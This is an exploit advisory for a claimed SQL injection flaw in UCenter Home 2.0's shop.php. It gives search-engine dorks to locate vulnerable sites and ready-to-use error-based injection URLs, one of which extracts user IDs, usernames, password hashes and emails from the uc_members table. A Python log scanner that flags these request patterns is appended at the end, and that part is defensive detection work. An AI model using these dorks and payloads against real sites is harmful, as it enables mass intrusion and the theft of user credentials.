__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit your DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
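
A log check for the request pattern above, added here as an example and not part of the original advisory: it flags shop.php requests whose shopid is not a plain integer and lists which substrings from the payloads shown appear in it. The access-log format, the function names and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Substrings taken from the payloads shown in this advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "unhex(")
# Request line of a common/combined-format access log (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def inspect_line(line):
    """Return a finding dict for a suspicious shop.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # a legitimate shop id is a plain integer
        text = re.sub(r"\s+", " ", value.lower())
        return {"shopid": value, "markers": [k for k in MARKERS if k in text]}
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = inspect_line(line)
        if finding:
            hits.append((n, finding))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:01:12 +0000] "GET /shop.php?ac=view&shopid=abc HTTP/1.1" 200 300',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        level = "error-based SQLi pattern" if f["markers"] else "non-integer shopid"
        print(f"line {n}: {level}: {f['shopid'][:60]!r}")
```

The non-integer check is the primary signal; the marker list only helps triage and will miss payloads that are obfuscated differently from the ones on this page.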